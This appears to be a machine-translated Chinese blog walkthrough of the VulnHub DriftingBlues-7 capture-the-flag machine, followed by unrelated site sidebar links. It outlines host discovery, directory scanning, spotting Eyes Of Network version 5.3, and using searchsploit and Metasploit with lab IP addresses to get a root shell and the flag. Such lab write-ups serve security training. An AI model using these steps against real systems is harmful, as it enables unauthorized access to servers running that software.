当前位置:网站首页>After reading this article, I will teach you to play with the penetration test target vulnhub - drivetingblues-7
After reading this article, I will teach you to play with the penetration test target vulnhub - drivetingblues-7
2022-06-25 10:42:00 【Lonely fish】
Vulnhub Drone aircraft DriftingBlues-7 Penetration test details
Vulnhub Introduction to target machine :
vulnhub It is a comprehensive shooting range providing various vulnerability platforms , A variety of virtual machines can be downloaded , Local VM Open the can , Complete the penetration test like a game 、 Raise the right 、 Exploit 、 Code audit and other interesting actual combat .
Update this issue Vulnhub DriftingBlues series I still found it as usual FLAG that will do , May be biased towards CTF spot .
Vulnhub Target download :
Official website address :https://www.vulnhub.com/entry/driftingblues-7,680/

After downloading, unzip the installation package Then try VMware that will do .
Vulnhub Detailed explanation of target vulnerability :
①: information gathering :
kali Use in netdiscover Discover the host 
Infiltration machine :kali IP :192.168.205.133 Drone aircraft IP :192.168.205.144
There are many ports opened this time Let's take a look at the old one first 80 The port page found is Eyes Of Network( See you for the first time )
Use dirsearch Sweep the backstage But we didn't find the desired results There is no usable information 
Here is to see that others have scanned what they have not I don't know why

visit :https://192.168.205.144/bower.json Found version number by 5.3
Use kali Search for the corresponding vulnerabilities :searchsploit Eyes Of Network 5.3
②: Exploit :
open msf Search related keywords Eyes Of Network

show options # View the parameters that need to be set

set RHOST 192.168.205.144
set LHOST 192.168.205.133
run

Get into shell Pattern cd /root see flag.txt
③: see flag:

So far, we have obtained all flag, End of penetration test .
Vulnhub Target penetration summary :
Feel this target It is particularly simple and does not involve the operation of raising the right Namely msf Basic use of
DriftingBlues The seventh target aircraft of the series will be updated in the future , It's not easy to create I hope that's helpful If you like it, please give me one button three times Your happiness is my greatest happiness !!
边栏推荐
- OODA working method
- 原生小程序开发注意事项总结
- 如何在Microsoft Exchange 2010中安装SSL证书
- Flask blog practice - realize personal center and authority management
- 炒股票开户的话,手机开户安全吗?有谁知道啊?
- WPF prism framework
- [image fusion] image fusion based on morphological analysis and sparse representation with matlab code
- Basic usage and principle of schedulemaster distributed task scheduling center
- JS【中高级】部分的知识点我帮你们总结好了
- 性能之网络篇
猜你喜欢

我的作文题目是——《我的区长父亲》

Network protocol learning -- lldp protocol learning

软件测试 避免“试用期被辞退“指南,看这一篇就够了

This is enough for request & response
![[today in history] June 24: Netease was established; The first consumer electronics exhibition was held; The first webcast in the world](/img/f7/b3239802d19d00f760bb3174649a89.jpg)
[today in history] June 24: Netease was established; The first consumer electronics exhibition was held; The first webcast in the world

P2P network core technology: Gossip protocol
![[dynamic planning] - Digital triangle](/img/79/79259ed8931a7968fb55f98a34d9e1.png)
[dynamic planning] - Digital triangle

CSRF attack

Dell technology performs the "fast" formula and plays ci/cd

Houdini图文笔记:Your driver settings have been set to force 4x Antialiasing in OpenGL applications问题的解决
随机推荐
CDN+COS搭建图床超详细步骤
What is CRA
keep-alive
Es learning
Performance memory
在Microsoft Exchange Server 2007中安装SSL证书的教程
Array structure collation
【动态规划】—— 数字三角形
无心剑中译伊玛·拉扎罗斯《新巨人·自由女神》
Detailed explanation of Android interview notes handler
一文了解Prometheus
Opencv learning (I) -- environment building
Is it safe to open an account through mobile phone if you open an account through stock speculation? Who knows?
宏的运用接续符\
OpenCV学习(二)---树莓派上安装opencv
CSRF攻击
原生小程序开发注意事项总结
Google Earth Engine(GEE)——evaluate实现一键批量下载研究区内的所有单张影像(上海市部分区域)
软件测试 避免“试用期被辞退“指南,看这一篇就够了
Solutions using protobuf in TS projects